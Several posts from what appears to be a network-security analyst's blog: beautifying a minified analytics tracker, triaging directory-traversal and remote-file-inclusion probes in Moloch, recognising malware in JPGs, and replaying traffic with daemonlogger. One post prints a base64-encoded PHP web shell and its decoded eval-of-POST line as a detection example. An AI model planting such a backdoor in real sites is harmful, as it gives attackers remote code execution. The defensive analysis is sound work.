Friday, February 28, 2014

JS Beautifier

There are various tools to help you clean up JavaScript and make it more readable when doing analysis. including the Linux program js-beautify, but there's also a great site called, appropriately enough, jsbeautifier.org. Paste in your code, choose your options, including whether or not you want to detect packers and obfuscators and hit Ctrl-enter or click the link. Here's some code I pulled from Wireshark..

eAt(d);128>c?b+=String.fromCharCode(c):(127c?b+=String.fromCharCode(c>>6|192):(b+=String.fromCharCode(c>>12|224),b+=String.fromCharCode(c>>6&63|128)),b+=String.fromCharCode(c&63|128))}return b}(a);f=function(a){var b,
c=a.length;b=c+8;for(var d=16*((b-b%64)/64+1),e=Array(d-1),f=0,g=0;g>>29;return e}(a);d=1732584193;c=4023233417;b=2562383102;e=271733878;for(a=0;a6],17,2821735955),c=k(c,b,e,d,f[a+7],22,4249261313),d=k(d,c,b,e,f[a+8],7,1770035416),e=k(e,d,c,b,f[a+9],12,2336552879),b=k(b,e,d,c,f[a+10],17,4294925233),c=k(c,b,e,d,f[a+11],22,2304563134),d=k(d,c,b,e,f[a+12],7,1804603682),e=k(e,d,c,b,f[a+13],12,4254626195),b=k(b,e,d,c,f[a+14],17,2792965006),c=k(c,b,e,d,f[a+15],22,1236535329),d=h(d,c,b,e,f[a+1],5,4129170786),e=h(e,d,c,b,f[a+6],9,3225465664),b=h(b,e,d,c,f[a+11],14,643717713),c=h(c,b,e,d,f[a+0],20,3921069994),d=h(d,c,b,e,f[a+5],5,3593408605),e=h(e,
d,c,b,f[a+10],9,38016083),b=h(b,e,d,c,f[a+15],14,3634488961),c=h(c,b,e,d,f[a+4],20,3889429448),d=h(d,c,b,e,f[a+9],5,568446438),e=h(e,d,c,b,f[a+14],9,3275163606),b=h(b,e,d,c,f[a+3],14,4107603335),c=h(c,b,e,d,f[a+8],20,1163531501),d=h(d,c,b,e,f[a+13],5,2850285829),e=h(e,d,c,b,f[a+2],9,4243563512),b=h(b,e,d,c,f[a+7],14,1735328473),c=h(c,b,e,d,f[a+12],20,2368359562),d=l(d,c,b,e,f[a+5],4,4294588738),e=l(e,d,c,b,f[a+8],11,2272392833),b=l(b,e,d,c,f[a+11],16,1839030562),c=l(c,b,e,d,f[a+14],23,4259657740),
d=l(d,c,b,e,f[a+1],4,2763975236),e=l(e,d,c,b,f[a+4],11,1272893353),b=l(b,e,d,c,f[a+7],16,4139469664),c=l(c,b,e,d,f[a+10],23,3200236656),d=l(d,c,b,e,f[a+13],4,681279174),e=l(e,d,c,b,f[a+0],11,3936430074),b=l(b,e,d,c,f[a+3],16,3572445317),c=l(c,b,e,d,f[a+6],23,76029189),d=l(d,c,b,e,f[a+9],4,3654602809),e=l(e,d,c,b,f[a+12],11,3873151461),b=l(b,e,d,c,f[a+15],16,530742520),c=l(c,b,e,d,f[a+2],23,3299628645),d=n(d,c,b,e,f[a+0],6,4096336452),e=n(e,d,c,b,f[a+7],10,1126891415),b=n(b,e,d,c,f[a+14],15,2878612391),
c=n(c,b,e,d,f[a+5],21,4237533241),d=n(d,c,b,e,f[a+12],6,1700485571),e=n(e,d,c,b,f[a+3],10,2399980690),b=n(b,e,d,c,f[a+10],15,4293915773),c=n(c,b,e,d,f[a+1],21,2240044497),d=n(d,c,b,e,f[a+8],6,1873313359),e=n(e,d,c,b,f[a+15],10,4264355552),b=n(b,e,d,c,f[a+6],15,2734768916),c=n(c,b,e,d,f[a+13],21,1309151649),d=n(d,c,b,e,f[a+4],6,4149444226),e=n(e,d,c,b,f[a+11],10,3174756917),b=n(b,e,d,c,f[a+2],15,718787259),c=n(c,b,e,d,f[a+9],21,3951481745),d=g(d,q),c=g(c,p),b=g(b,m),e=g(e,s);return(t(d)+t(c)+t(b)+
t(e)).toLowerCase()}function Q(a,g,k){var h="";k&&(h=new Date,h.setTime(h.getTime()+864E5*k),h="; expires\x3d"+h.toGMTString());u.cookie=a+"\x3d"+g+h+"; path\x3d/"}function R(a){a+="\x3d";for(var g=u.cookie.split(";"),k=0;kg,function(){return k.call(a,m.event)})}function D(){var a=(new Date).getTime();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(g){var k=(a+16*F.random())%16|0;a=F.floor(a/16);return("x"==g?k:k&7|8).toString(16)})}function S(){return F.max(r.scrollHeight||0,w.scrollHeight||0,r.offsetHeight||0,w.offsetHeight||0,r.clientHeight||0,w.clientHeight||0)}function aa(){var a=u&&u.scrollTop||r&&r.scrollTop||0;a>N&&(N=a);a=100*(((u&&u.scrollTop||r&&r.scrollTop||0)+(m.innerHeight||w.clientHeight||
r.clientHeight||0))/S());a>O&&(O=F.floor(a))}function T(){I&&(P+=1*new Date-I,I=!1)}function ba(){H(m,"blur",function(){T()});H(m,"focus",function(){I=1*new Date})}function ca(){for(var a=2;10>a;a++)try{if(x("PDF.PdfCtrl."+a))return"Adobe Acrobat version"+a+".?"}catch(g){}try{if(x("PDF.PdfCtrl.1"))return"Adobe Acrobat version 4.?"}catch(k){}try{if(x("AcroPDF.PDF.1"))return"Adobe Acrobat version 7.?"}catch(h){}return""}function da(){try{var a=x("AgControl.AgControl");if(!a)return"";try{return J("AgControl.AgControl",
a.c("$version"))}catch(g){try{return J("AgControl.AgControl",a.g())}catch(k){try{for(var h,l=1;9>l;l++)a.k(l+".0")&&(h=l);return"AgControl.AgControl "+(h||"-1")}catch(n){return"AgControl.AgControl -1"}}}}catch(m){return""}}function J(a,g){return a+" "+g}function x(a){return new m.ActiveXObject(a)}function ea(){if(G.a)for(var a in G.a)fa(a,G.a[a])}function fa(a,g){m.setTimeout(function(){m[A]("send",a)},g)}function ga(a,g){if(!B)throw"Petametrics.send called before Petametrics.init";var k=new Image,
h="//api.petametrics.com/__activity.gif?ts\x3d"+encodeURIComponent((new Date).getTime())+"\x26jsk\x3d"+encodeURIComponent(B)+"\x26e\x3d"+encodeURIComponent(a)+"\x26uid\x3d"+encodeURIComponent(K)+"\x26sid\x3d"+encodeURIComponent(L)+"\x26pvid\x3d"+encodeURIComponent(U)+"\x26dc\x3d"+encodeURIComponent(u.cookie)+"\x26tzo\x3d"+encodeURIComponent((new Date).getTimezoneOffset())+"\x26ua\x3d"+encodeURIComponent(E.userAgent)+"\x26l\x3d"+encodeURIComponent(E.language)+"\x26os\x3d"+encodeURIComponent(E.platform)+
"\x26scd\x3d"+encodeURIComponent(M.colorDepth)+"\x26scrh\x3d"+encodeURIComponent(M.height)+"\x26scrw\x3d"+encodeURIComponent(M.width)+"\x26cu\x3d"+encodeURIComponent(m.location.href)+"\x26ref\x3d"+encodeURIComponent(u.referrer)+"\x26sppx\x3d"+encodeURIComponent(N)+"\x26sppc\x3d"+encodeURIComponent(O)+"\x26dh\x3d"+encodeURIComponent(S())+"\x26jsv\x3d"+encodeURIComponent(ha)+"\x26rs\x3d"+encodeURIComponent(F.random().toString(36).substr(2,16))+"\x26plh\x3d",l=encodeURIComponent,n=Z,t="";if(E.plugins){for(var f=
E.plugins,q=[],p=0;pe.c("$version"))}catch(A){b=""}b=s+b;var z;try{var v=x("SWCtl.SWCtl");z=!v?"":J("SWCtl.SWCtl",v.i(""))}catch(G){z=""}z=b+z;v=["rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","RealPlayer"];e=b=C;for(s=0;sh+l(n(t)),y;for(y in V)h+="\x26"+y+"\x3d"+encodeURIComponent(V[y]);for(var D in g)h+="\x26"+D+"\x3d"+encodeURIComponent(g[D]);k.src=h}function W(a){a=Array.prototype.slice.call(a);switch(a[0]){case "init":ia.apply({},a.slice(1));break;case "send":ga.apply({},a.slice(1))}}function ia(a,g){if(B)throw"Petametrics.init called more than once.";B=a;H(m,"scroll",aa);H(m,"unload",function(){T();m[A]("send","exit",{viewingDuration:P/1E3})});$(g);K=R(X);K||(K=D(),Q(X,K,365));L=R(Y);L||(L=D(),Q(Y,L));U=D();
ea();ba();B in y&&"undefined"!=typeof y[B].b&&y[B].b()}var A=m.$petametricsVar,B=C,ha="0.2.3",X="__pmp",Y="__pmt",K=C,L=C,U=C,V={},G={a:{stuck_10s:1E4,stuck_3m:18E4}},r=u.body,w=u.documentElement,N=0,O=0,P=0,I=m[A].l,ja=function(){return{j:function(a){a=escape(a);var g="",k,h,l="",n,m,f="",q=0;do k=a.charCodeAt(q++),h=a.charCodeAt(q++),l=a.charCodeAt(q++),n=k>>2,k=(k&3)<<4 h="">>4,m=(h&15)<<2 l="">>6,f=l&63,isNaN(h)?m=f=64:isNaN(l)&&(f=64),g=g+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(n)+
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(k)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(m)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(f);while(qh="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),m="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),k=k<<2 h="">>4,h=(h&15)<<4 n="">>2,l=(n&3)<<6 a.length="" amp="" f9jdao1edm5dkqi="" f="" g="" h="" k="" l="" m="" n="" p="" return="" tring.fromcharcode="" unescape="" while="" y="{};(function(a,g){y[a]=g})(">{e:/\/q\/([A-Za-z0-9=]{0,})\?/,b:function(){var a=this.e.exec(m.location);1>=a.length||(a=ja.d(a[1]),m[A]("send","item_shown",{item_details:a}))}});(function(){var a=m[A].q||[];m[A]=function(){W(argument

and here's how the Online JavaScript Beautifier cleaned it up...



eAt(d);
128 > c ? b += String.fromCharCode(c) : (127 < c && 2048 > c ? b += String.fromCharCode(c >> 6 | 192) : (b += String.fromCharCode(c >> 12 | 224), b += String.fromCharCode(c >> 6 & 63 | 128)), b += String.fromCharCode(c & 63 | 128))
}
return b
}(a);
f = function (a) {
    var b,
        c = a.length;
    b = c + 8;
    for (var d = 16 * ((b - b % 64) / 64 + 1), e = Array(d - 1), f = 0, g = 0; g < c;) b = (g - g % 4) / 4, f = 8 * (g % 4), e[b] |= a.charCodeAt(g) << f, g++;
    b = (g - g % 4) / 4;
    e[b] |= 128 << 8 * (g % 4);
    e[d - 2] = c << 3;
    e[d - 1] = c >>> 29;
    return e
}(a);
d = 1732584193;
c = 4023233417;
b = 2562383102;
e = 271733878;
for (a = 0; a < f.length; a += 16) q = d, p = c, m = b, s = e, d = k(d, c, b, e, f[a + 0], 7, 3614090360), e = k(e, d, c, b, f[a + 1], 12, 3905402710), b = k(b, e, d, c, f[a + 2], 17, 606105819), c = k(c, b, e, d, f[a + 3], 22, 3250441966), d = k(d, c, b, e, f[a + 4], 7, 4118548399), e = k(e, d, c, b, f[a + 5], 12, 1200080426), b = k(b, e, d, c, f[a +
    6], 17, 2821735955), c = k(c, b, e, d, f[a + 7], 22, 4249261313), d = k(d, c, b, e, f[a + 8], 7, 1770035416), e = k(e, d, c, b, f[a + 9], 12, 2336552879), b = k(b, e, d, c, f[a + 10], 17, 4294925233), c = k(c, b, e, d, f[a + 11], 22, 2304563134), d = k(d, c, b, e, f[a + 12], 7, 1804603682), e = k(e, d, c, b, f[a + 13], 12, 4254626195), b = k(b, e, d, c, f[a + 14], 17, 2792965006), c = k(c, b, e, d, f[a + 15], 22, 1236535329), d = h(d, c, b, e, f[a + 1], 5, 4129170786), e = h(e, d, c, b, f[a + 6], 9, 3225465664), b = h(b, e, d, c, f[a + 11], 14, 643717713), c = h(c, b, e, d, f[a + 0], 20, 3921069994), d = h(d, c, b, e, f[a + 5], 5, 3593408605), e = h(e,
    d, c, b, f[a + 10], 9, 38016083), b = h(b, e, d, c, f[a + 15], 14, 3634488961), c = h(c, b, e, d, f[a + 4], 20, 3889429448), d = h(d, c, b, e, f[a + 9], 5, 568446438), e = h(e, d, c, b, f[a + 14], 9, 3275163606), b = h(b, e, d, c, f[a + 3], 14, 4107603335), c = h(c, b, e, d, f[a + 8], 20, 1163531501), d = h(d, c, b, e, f[a + 13], 5, 2850285829), e = h(e, d, c, b, f[a + 2], 9, 4243563512), b = h(b, e, d, c, f[a + 7], 14, 1735328473), c = h(c, b, e, d, f[a + 12], 20, 2368359562), d = l(d, c, b, e, f[a + 5], 4, 4294588738), e = l(e, d, c, b, f[a + 8], 11, 2272392833), b = l(b, e, d, c, f[a + 11], 16, 1839030562), c = l(c, b, e, d, f[a + 14], 23, 4259657740),
d = l(d, c, b, e, f[a + 1], 4, 2763975236), e = l(e, d, c, b, f[a + 4], 11, 1272893353), b = l(b, e, d, c, f[a + 7], 16, 4139469664), c = l(c, b, e, d, f[a + 10], 23, 3200236656), d = l(d, c, b, e, f[a + 13], 4, 681279174), e = l(e, d, c, b, f[a + 0], 11, 3936430074), b = l(b, e, d, c, f[a + 3], 16, 3572445317), c = l(c, b, e, d, f[a + 6], 23, 76029189), d = l(d, c, b, e, f[a + 9], 4, 3654602809), e = l(e, d, c, b, f[a + 12], 11, 3873151461), b = l(b, e, d, c, f[a + 15], 16, 530742520), c = l(c, b, e, d, f[a + 2], 23, 3299628645), d = n(d, c, b, e, f[a + 0], 6, 4096336452), e = n(e, d, c, b, f[a + 7], 10, 1126891415), b = n(b, e, d, c, f[a + 14], 15, 2878612391),
c = n(c, b, e, d, f[a + 5], 21, 4237533241), d = n(d, c, b, e, f[a + 12], 6, 1700485571), e = n(e, d, c, b, f[a + 3], 10, 2399980690), b = n(b, e, d, c, f[a + 10], 15, 4293915773), c = n(c, b, e, d, f[a + 1], 21, 2240044497), d = n(d, c, b, e, f[a + 8], 6, 1873313359), e = n(e, d, c, b, f[a + 15], 10, 4264355552), b = n(b, e, d, c, f[a + 6], 15, 2734768916), c = n(c, b, e, d, f[a + 13], 21, 1309151649), d = n(d, c, b, e, f[a + 4], 6, 4149444226), e = n(e, d, c, b, f[a + 11], 10, 3174756917), b = n(b, e, d, c, f[a + 2], 15, 718787259), c = n(c, b, e, d, f[a + 9], 21, 3951481745), d = g(d, q), c = g(c, p), b = g(b, m), e = g(e, s);
return (t(d) + t(c) + t(b) +
    t(e)).toLowerCase()
}

function Q(a, g, k) {
    var h = "";
    k && (h = new Date, h.setTime(h.getTime() + 864E5 * k), h = "; expires\x3d" + h.toGMTString());
    u.cookie = a + "\x3d" + g + h + "; path\x3d/"
}

function R(a) {
    a += "\x3d";
    for (var g = u.cookie.split(";"), k = 0; k < g.length; k++) {
        for (var h = g[k];
            " " == h.charAt(0);) h = h.substring(1, h.length);
        if (0 === h.indexOf(a)) return h.substring(a.length, h.length)
    }
    return C
}

function $(a) {
    for (var g in a) a.hasOwnProperty(g) && (G[g] = a[g])
}

function H(a, g, k) {
    a.addEventListener ? a.addEventListener(g, k, !1) : a.attachEvent("on" +
        g, function () {
            return k.call(a, m.event)
        })
}

function D() {
    var a = (new Date).getTime();
    return "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, function (g) {
        var k = (a + 16 * F.random()) % 16 | 0;
        a = F.floor(a / 16);
        return ("x" == g ? k : k & 7 | 8).toString(16)
    })
}

function S() {
    return F.max(r.scrollHeight || 0, w.scrollHeight || 0, r.offsetHeight || 0, w.offsetHeight || 0, r.clientHeight || 0, w.clientHeight || 0)
}

function aa() {
    var a = u && u.scrollTop || r && r.scrollTop || 0;
    a > N && (N = a);
    a = 100 * (((u && u.scrollTop || r && r.scrollTop || 0) + (m.innerHeight || w.clientHeight ||
        r.clientHeight || 0)) / S());
    a > O && (O = F.floor(a))
}

function T() {
    I && (P += 1 * new Date - I, I = !1)
}

function ba() {
    H(m, "blur", function () {
        T()
    });
    H(m, "focus", function () {
        I = 1 * new Date
    })
}

function ca() {
    for (var a = 2; 10 > a; a++) try {
        if (x("PDF.PdfCtrl." + a)) return "Adobe Acrobat version" + a + ".?"
    } catch (g) {}
    try {
        if (x("PDF.PdfCtrl.1")) return "Adobe Acrobat version 4.?"
    } catch (k) {}
    try {
        if (x("AcroPDF.PDF.1")) return "Adobe Acrobat version 7.?"
    } catch (h) {}
    return ""
}

function da() {
    try {
        var a = x("AgControl.AgControl");
        if (!a) return "";
        try {
            return J("AgControl.AgControl",
                a.c("$version"))
        } catch (g) {
            try {
                return J("AgControl.AgControl", a.g())
            } catch (k) {
                try {
                    for (var h, l = 1; 9 > l; l++) a.k(l + ".0") && (h = l);
                    return "AgControl.AgControl " + (h || "-1")
                } catch (n) {
                    return "AgControl.AgControl -1"
                }
            }
        }
    } catch (m) {
        return ""
    }
}

function J(a, g) {
    return a + " " + g
}

function x(a) {
    return new m.ActiveXObject(a)
}

function ea() {
    if (G.a)
        for (var a in G.a) fa(a, G.a[a])
}

function fa(a, g) {
    m.setTimeout(function () {
        m[A]("send", a)
    }, g)
}

function ga(a, g) {
    if (!B) throw "Petametrics.send called before Petametrics.init";
    var k = new Image,
        h = "//api.petametrics.com/__activity.gif?ts\x3d" + encodeURIComponent((new Date).getTime()) + "\x26jsk\x3d" + encodeURIComponent(B) + "\x26e\x3d" + encodeURIComponent(a) + "\x26uid\x3d" + encodeURIComponent(K) + "\x26sid\x3d" + encodeURIComponent(L) + "\x26pvid\x3d" + encodeURIComponent(U) + "\x26dc\x3d" + encodeURIComponent(u.cookie) + "\x26tzo\x3d" + encodeURIComponent((new Date).getTimezoneOffset()) + "\x26ua\x3d" + encodeURIComponent(E.userAgent) + "\x26l\x3d" + encodeURIComponent(E.language) + "\x26os\x3d" + encodeURIComponent(E.platform) +
            "\x26scd\x3d" + encodeURIComponent(M.colorDepth) + "\x26scrh\x3d" + encodeURIComponent(M.height) + "\x26scrw\x3d" + encodeURIComponent(M.width) + "\x26cu\x3d" + encodeURIComponent(m.location.href) + "\x26ref\x3d" + encodeURIComponent(u.referrer) + "\x26sppx\x3d" + encodeURIComponent(N) + "\x26sppc\x3d" + encodeURIComponent(O) + "\x26dh\x3d" + encodeURIComponent(S()) + "\x26jsv\x3d" + encodeURIComponent(ha) + "\x26rs\x3d" + encodeURIComponent(F.random().toString(36).substr(2, 16)) + "\x26plh\x3d",
        l = encodeURIComponent,
        n = Z,
        t = "";
    if (E.plugins) {
        for (var f =
            E.plugins, q = [], p = 0; p < f.length; p++) {
            q[p] = f[p].name + "; ";
            q[p] += f[p].description + "; ";
            q[p] += f[p].filename + ";";
            for (var r = 0; r < f[p].length; r++) q[p] += " (" + f[p][r].description + "; " + f[p][r].type + "; " + f[p][r].suffixes + ")";
            q[p] += ". "
        }
        q.sort();
        for (p = 0; p < f.length; p++) t += "Plugin " + p + ": " + q[p]
    }
    if ("" === t && m.ActiveXObject) {
        var f = ca(),
            s;
        try {
            var d = x("WMPlayer.OCX");
            s = !d ? "" : "WMPlayer.OCX " + d.m
        } catch (c) {
            s = ""
        }
        s = f + s;
        var b;
        try {
            var e = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
            b = !e ? "" : J("ShockwaveFlash.ShockwaveFlash",
                e.c("$version"))
        } catch (A) {
            b = ""
        }
        b = s + b;
        var z;
        try {
            var v = x("SWCtl.SWCtl");
            z = !v ? "" : J("SWCtl.SWCtl", v.i(""))
        } catch (G) {
            z = ""
        }
        z = b + z;
        v = ["rmocx.RealPlayer G2 Control", "rmocx.RealPlayer G2 Control.1", "RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)", "RealVideo.RealVideo(tm) ActiveX Control (32-bit)", "RealPlayer"];
        e = b = C;
        for (s = 0; s < v.length; s++) {
            try {
                e = v[s], b = x(v[s])
            } catch (H) {
                continue
            }
            if (b) break
        }
        v = !b ? "" : J(e, b.f());
        z += v;
        var w;
        try {
            w = "QuickTime.QuickTime " + x("QuickTime.QuickTime").h
        } catch (I) {
            w = ""
        }
        t += z + w + da()
    }
    var h =
        h + l(n(t)),
        y;
    for (y in V) h += "\x26" + y + "\x3d" + encodeURIComponent(V[y]);
    for (var D in g) h += "\x26" + D + "\x3d" + encodeURIComponent(g[D]);
    k.src = h
}

function W(a) {
    a = Array.prototype.slice.call(a);
    switch (a[0]) {
    case "init":
        ia.apply({}, a.slice(1));
        break;
    case "send":
        ga.apply({}, a.slice(1))
    }
}

function ia(a, g) {
    if (B) throw "Petametrics.init called more than once.";
    B = a;
    H(m, "scroll", aa);
    H(m, "unload", function () {
        T();
        m[A]("send", "exit", {
            viewingDuration: P / 1E3
        })
    });
    $(g);
    K = R(X);
    K || (K = D(), Q(X, K, 365));
    L = R(Y);
    L || (L = D(), Q(Y, L));
    U = D();
    ea();
    ba();
    B in y && "undefined" != typeof y[B].b && y[B].b()
}
var A = m.$petametricsVar,
    B = C,
    ha = "0.2.3",
    X = "__pmp",
    Y = "__pmt",
    K = C,
    L = C,
    U = C,
    V = {}, G = {
        a: {
            stuck_10s: 1E4,
            stuck_3m: 18E4
        }
    }, r = u.body,
    w = u.documentElement,
    N = 0,
    O = 0,
    P = 0,
    I = m[A].l,
    ja = function () {
        return {
            j: function (a) {
                a = escape(a);
                var g = "",
                    k, h, l = "",
                    n, m, f = "",
                    q = 0;
                do k = a.charCodeAt(q++), h = a.charCodeAt(q++), l = a.charCodeAt(q++), n = k >> 2, k = (k & 3) << 4 | h >> 4, m = (h & 15) << 2 | l >> 6, f = l & 63, isNaN(h) ? m = f = 64 : isNaN(l) && (f = 64), g = g + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(n) +
                    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(k) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(m) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(f); while (q < a.length);
                return g
            },
            d: function (a) {
                var g = "",
                    k, h, l = "",
                    n, m = "",
                    f = 0;
                if (/[^A-Za-z0-9\+\/\=]/g.exec(a)) return "error parsing b64: invalid chars";
                a = a.replace(/[^A-Za-z0-9\+\/\=]/g, "");
                do k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),
                h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), n = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), m = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), k = k << 2 | h >> 4, h = (h & 15) << 4 | n >> 2, l = (n & 3) << 6 | m, g += String.fromCharCode(k), 64 != n && (g += String.fromCharCode(h)), 64 != m && (g += String.fromCharCode(l));
                while (f < a.length);
                return unescape(g)
            }
        }
    }(),
    y = {};
(function (a, g) {
    y[a] = g
})("f9jdao1edm5dkqi", {
        e: /\/q\/([A-Za-z0-9=]{0,})\?/,
        b: function () {
            var a = this.e.exec(m.location);
            1 >= a.length || (a = ja.d(a[1]), m[A]("send", "item_shown", {
                item_details: a
            }))
        }
    });
(function () {
        var a = m[A].q || [];
        m[A] = function () {
            W(argument

Monday, February 24, 2014

SPI View in Moloch

The Moloch packet capture and analysis tool (https://github.com/aol/moloch) has an SPI view tab with expandable views of the data it's indexed in Elastic Search. The categories are: General, HTTP, DNS, IRC, Certificates, SSH, Socks, Email and SMB. After doing a search in the Sessions tab, when you click on SPI View (or SPI Graph or Connections) the tab is populated initially with your search query. Making use of index fields in these categories can cut down significantly on your analysis time.


For example, many times you'll need to look at multiple sessions from a source that has launched various attacks on an external host. After searching for the IP of the attacker, you could expand each connection in the Sessions tab to view the response of the server under attack, and this is much faster using Moloch than pulling  packets from your pcaps manually. However, there's a quicker way to see an overview of all of the attacks that might mitigate the need to view each connection individually using SPI View.


Example:


We have a large number of alerts from an external host trying a number of different exploits on a server or servers. Our IDS is showing us alerts from the HI_CLIENT_WEBROOT_DIR rule, all ending with either a directory traversal attempt to enumerate /etc/passwd/ or do a file inclusion exploit involving http://www.google.com/humans.txt to see if remote file inclusion is possible. From the SPI VIEW tab we can enable the URI field under the HTTP category and display the captured URI of all packets from the attacker. We know the servers being targeted are Windows based, so we can disregard the directory traversal attempts to /etc/passwd, and we can look at one connection and see that the remote file inclusion attempt results in an 301 Moved Permanently status code. Now looking at all the URI's we can see all attacks were of the same type, and therefore not successful, without looking at each individual session.


Our other alternative would have been to check one of each type of attack and review them all en masse as unsuccessful. But without this extra step of analysis and due diligence, we might have missed an different type of attack buried in the noise (this particular session registered over 1,400 connections in Moloch). Some attackers will use a large, noisy flooding of attacks they know will not succeed to attempt to obfuscate one targeted attack that has a high probability of success, hoping the analyst will either be overwhelmed by the number of alerts or just investigate a few and discard the rest. This can result in missing the singular exploit attempt. Having an intelligent packet capture and analysis tool like Moloch helps mitigate this method

Thursday, February 20, 2014

Base64 alerts

Base64 encoding alerts are usually low impact, but if you see a string like this:

......JFIF..............Exif..II*...............&.......m...,......./.*/e.eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));....


Which decodes to this:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

it’s indicative of malware hiding in a JPG.


Monday, February 10, 2014

Generating Traffic With Daemonlogger for IDS/IPS Testing

daemonlogger, the packet capturing utility by Marty Roesch can also act as a soft tap (meaning a software tap as opposed to a physical tap). What this means is you can sniff traffic from one interface and replay those packets to another interface.
For example, say you have a packet capture box that is receiving packets from a tap on interface 1. You have an IDS sensor you want to generate traffic to and test a policy or a signature, or that you're doing an evaluation of.
You can use daemonlogger to sniff the traffic on interface 1 and send that traffic to another interface that is patched to the sensor.
Assuming you have eth1 patched to the tap and eth2 patched to the monitoring interface on the sensor:
Run the command:
 daemonlogger -i eth1 -o eth2 
and all the packets from eth1 will be streamed to eth2.
You can also replay a pcap in a similar manner. Just substitute -i with -R (note this is capital R; lower case r activates the ring buffer).
daemonlogger -R new_trojan.pcap -o eth2
You can use BPF's as well, the same way you would when capturing traffic.
If you put your Berkeley Packet Filters in a file you can load it using -f.

Blog Archive